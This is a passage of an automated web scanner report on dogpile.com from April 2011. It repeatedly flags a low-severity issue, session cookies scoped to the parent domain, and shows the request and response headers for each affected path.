Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=995f53cbbb4c4da7993ac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:23 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:23 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:23 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:22 GMT
Connection: close
Content-Length: 55891
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.50. http://www.dogpile.com/dogpile_other/ws/tips/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/tips/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_other/ws/tips/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=6172a79eb9f246e79ad9c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:30 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:30 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:30 GMT
Connection: close
Content-Length: 43940
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.51. http://www.dogpile.com/dogpile_prefer/ws/redir/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_prefer/ws/redir/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_prefer/ws/redir/_iceUrlFlag=11?_IceUrl=true&qkw={searchTerms} HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.dogpile.com/dogpile_prefer/ws/results/Web/%7BsearchTerms%7D/1/0/0/Relevance/iq=true/zoom=off/_iceUrlFlag=7?_IceUrl=true
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=a9902889eb724bb4a6c8c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:51 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:50 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:50 GMT
Connection: close
Content-Length: 247

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_prefer/ws/results/Web/%7BsearchTerms%7D/1/0/0/Relevance/iq=true/zoom=off/_iceUrlFlag=7
...[SNIP]...

6.52. http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_rss/web/GE+Zero+Taxes

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/web/GE+Zero+Taxes HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:02 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301676962746; wsRecent=MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=86d1546926784d5188d2c16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 302 Redirect
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: http://www.dogpile.com/dogpile_other/ws/index
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:05 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:05 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:05 GMT
Connection: close
Content-Length: 168

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.dogpile.com/dogpile_other/ws/index">here</a></body>

6.53. http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_rss/web/Go+Daddy+CEO+Elephant

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/web/Go+Daddy+CEO+Elephant HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=86d1546926784d5188d2c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:02 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301676962746; wsRecent=MLB+Schedule,Web,Relevance,

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=af5ad2b55c194ed28a4dc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:15:58 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:58 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:55:58 GMT; path=/
Set-Cookie: wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301676971532; path=/
Set-Cookie: wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:55:58 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 162043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.54. http://www.dogpile.com/dogpile_rss/web/MLB+Schedule

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_rss/web/MLB+Schedule

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/web/MLB+Schedule HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:44 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=91f95e6548a4490186bdc16a3af0cb01&ActionId=62fda6b6aa3440d49bc7c16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=62fda6b6aa3440d49bc7c16a3af0cb01&ActionId=86d1546926784d5188d2c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:02 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:02 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:02 GMT; path=/
Set-Cookie: wsTemp=bigIP+3758658826.20480.0000+cacheId+ms18:1301676962746; path=/
Set-Cookie: wsRecent=MLB+Schedule,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:03 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 147703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.55. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/about/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/about/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=7d43bcdc3ae442d4896bc16a3af0cb01&ActionId=ca6e8004e2754a219792c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:42 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:42 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:41 GMT
Connection: close
Content-Length: 45251
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.56. http://www.dogpile.com/dogpile_rss/ws/aboutresults/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/aboutresults/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/aboutresults/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=87f215cdd6a246a69870c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:52 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:52 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:52 GMT
Connection: close
Content-Length: 42015
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.57. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/faq/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/faq/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=7d43bcdc3ae442d4896bc16a3af0cb01&ActionId=3f9553d8ae70430197ccc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:39 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:39 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:39 GMT
Connection: close
Content-Length: 64467
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.58. http://www.dogpile.com/dogpile_rss/ws/ie8upgradelearnmore/rfcid=978/rfcp=TopNavigation/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/ie8upgradelearnmore/rfcid=978/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/ie8upgradelearnmore/rfcid=978/rfcp=TopNavigation/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=7d43bcdc3ae442d4896bc16a3af0cb01&ActionId=c1eb80fd75d841fcb438c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:54 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:54 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:54 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:54 GMT
Connection: close
Content-Length: 43755
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.59. http://www.dogpile.com/dogpile_rss/ws/index/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/index/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/index/?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677190970; wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:08:30 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=efab2d4d5b684fe9b96cc16a3af0cb01&ActionId=fc23be7bf89f4d2eac78c16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=50b69dc71f5b4e528b29c16a3af0cb01&ActionId=e35e7644240d4a61a75ec16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:29:12 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:09:12 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:09:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:09:12 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.60. http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/index/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/index/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=d5d171eb7a7b49f68a6ec16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:57 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:57 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:57 GMT
Connection: close
Content-Length: 45807
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.61. http://www.dogpile.com/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: